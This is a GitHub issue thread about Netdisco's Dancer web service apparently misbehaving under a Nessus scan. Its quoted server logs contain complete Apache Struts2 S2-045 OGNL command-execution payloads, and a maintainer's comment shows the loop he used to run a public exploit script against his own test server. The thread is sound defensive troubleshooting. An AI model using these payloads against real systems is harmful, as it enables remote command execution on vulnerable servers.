### ISSUE TITLE
Netdisco Dancer crash on security scan

### ISSUE THREAD

**Issue by zoeloe** [netdisco/netdisco#745]
## Expected Behavior
Resists security test.

## Current Behavior
Netdisco web service partially crashes and one of the symptoms is it stops generating output results (e.g. when using IP inventory)

## Steps to Reproduce (for bugs)
Attache netdisco with nessus scans.

## Context
The following  nessus requested URL seem to generate errors:
GET /RlR6Naa6qBNH HTTP/1.1" 200 7029 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
::ffff:134.184.159.225 - - [01/Sep/2020:18:56:11 +0200] "GET / HTTP/1.1" 200 7026 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
Invalid boundary in content_type: '%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Tenable','Llv6cvMI')}.multipart/form-data' at /home/netdisco/perl5/lib/perl5/Dancer/Request.pm line 144.
::ffff:134.184.159.225 - - [01/Sep/2020:18:56:11 +0200] "GET /w5MRSI6PxZkT HTTP/1.1" 200 7029 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
::ffff:134.184.159.225 - - [01/Sep/2020:18:56:11 +0200] "GET / HTTP/1.1" 200 7026 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
Invalid boundary in content_type: '%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c','ipconfig','/all'}:{'bash','-c','id'})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}' at /home/netdisco/perl5/lib/perl5/Dancer/Request.pm line 144.
::ffff:134.184.159.225 - - [01/Sep/2020:18:56:11 +0200] "GET /hfBjeSZVXPNh HTTP/1.1" 200 7029 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
::ffff:134.184.159.225 - - [01/Sep/2020:18:56:11 +0200] "GET /error_page.htm HTTP/1.1" 200 7031 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
::ffff:134.184.159.225 - - [01/Sep/2020:18:56:11 +0200] "GET / HTTP/1.1" 200 7026 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
::ffff:134.184.159.225 - - [01/Sep/2020:18:56:11 +0200] "GET / HTTP/1.1" 200 7026 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
::ffff:134.184.159.225 - - [01/Sep/2020:18:56:11 +0200] "GET /kmw7nllPYCCN HTTP/1.1" 200 7029 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
Invalid boundary in content_type: '%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Tenable','UU0fDlV8')}.multipart/form-data' at /home/netdisco/perl5/lib/perl5/Dancer/Request.pm line 144.
Invalid boundary in content_type: '%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c','ipconfig','/all'}:{'bash','-c','id'})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}' at /home/netdisco/perl5/lib/perl5/Dancer/Request.pm line 144.

## Your Environment
* Netdisco version used: 2.045000
* SNMP::Info version used: 3.70

**Comment by rc9000** [comment]
related to #715

**Comment by ollyg** [comment]
Looks like this is a problem in Dancer::Request, not Netdisco:

````
Invalid boundary in content_type: '%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Tenable','Llv6cvMI')}.multipart/form-data' at /home/netdisco/perl5/lib/perl5/Dancer/Request.pm line 144.

So, nothing we can fix. Over to their bug queue? Good luck, I'm not sure it's in maintenance any more. Possibly ask on their IRC.
````

**Comment by rc9000** [comment]
I gave this a quick spin with the exploit code from here: https://github.com/rapid7/metasploit-framework/issues/8064

Both in hope of maybe seeing an easy fix for your issue and shed some light in [complaints on the mailing list ](https://sourceforge.net/p/netdisco/mailman/netdisco-users/thread/101A86A6-C8CF-4316-BB40-E51F727C56A9%40clemson.edu/#msg37115443) about similar symptoms, unrelated to scans but apparently just appearing after a while of user traffic.

However I ran the exploit a couple thousand times in a loop (`for x in $(seq 1 5000) ; do ./struts2_S2-045.py http://myserver:5000/ "ls -l"  ; done`) and for me the GUI gets a bit slower afterwards, but IP Inventory etc. still work fine. The only thing that gets really quite bad is the autocomplete in the top search bar, but it's mostly since it has no delay and starts a parallel request for every character typed.

Can you try this loop and see if it reliably crashes your IP Inventory?


PS the output will look something like if everything is correct with python, the url etc:
```

[*] CVE: 2017-5638 - Apache Struts2 S2-045
[*] cmd: ls -l

Traceback (most recent call last):
  File "./struts2_S2-045.py", line 47, in <module>
    exploit(url, cmd)
  File "./struts2_S2-045.py", line 30, in exploit
    page = urllib2.urlopen(request).read()
  File "/usr/lib64/python2.7/urllib2.py", line 154, in urlopen
    return opener.open(url, data, timeout)
  File "/usr/lib64/python2.7/urllib2.py", line 435, in open
    response = meth(req, response)
  File "/usr/lib64/python2.7/urllib2.py", line 548, in http_response
    'http', request, response, code, msg, hdrs)
  File "/usr/lib64/python2.7/urllib2.py", line 473, in error
    return self._call_chain(*args)
  File "/usr/lib64/python2.7/urllib2.py", line 407, in _call_chain
    result = func(*args)
  File "/usr/lib64/python2.7/urllib2.py", line 556, in http_error_default
    raise HTTPError(req.get_full_url(), code, msg, hdrs, fp)
urllib2.HTTPError: HTTP Error 500: Internal Server Error

```

**Comment by zoeloe** [comment]
Hi, Thanks for the followup.
Ran your test.
Although this test generates the "/home/netdisco/perl5/lib/perl5/Dancer/Request.pm line 144." error,... it doesn't seem to crash the inventory report module. I think I saw at first that the autocomplete wasn't functioning,.  but after a slow search,  that didn't occur anymore IMHO.
Also I noticed that our Opsec team ran a Nessus scan 2 day ago. And the inventory still functioned.
My guess I'll have to wait till the Opsec team generates another crash.

Thanks for your input ! I appreciate !
